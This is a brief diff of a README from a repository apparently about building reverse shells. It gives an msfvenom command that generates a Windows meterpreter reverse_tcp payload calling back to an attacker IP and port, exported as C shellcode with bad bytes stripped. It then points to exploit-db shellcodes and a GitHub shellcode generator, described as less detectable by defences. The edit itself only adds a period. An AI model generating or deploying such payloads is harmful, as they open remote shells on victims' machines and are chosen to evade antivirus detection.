bigbadcyborg/reverse-shell/README.md

       $msfvenom -p windows/meterpreter/reverse_tcp lhost={IP of attacker} lport={port #} --format c -o payload-22.c -b "\x00\x0A\x0\x0C\x0D"

   An alternative would be to check out www.exploit-db.com/shellcodes/ for people who create their own shellcode generators.
-      These can be less detectable
+      These can be less detectable.
   Here's one i found:
   https://github.com/senzee1984/micr0_shell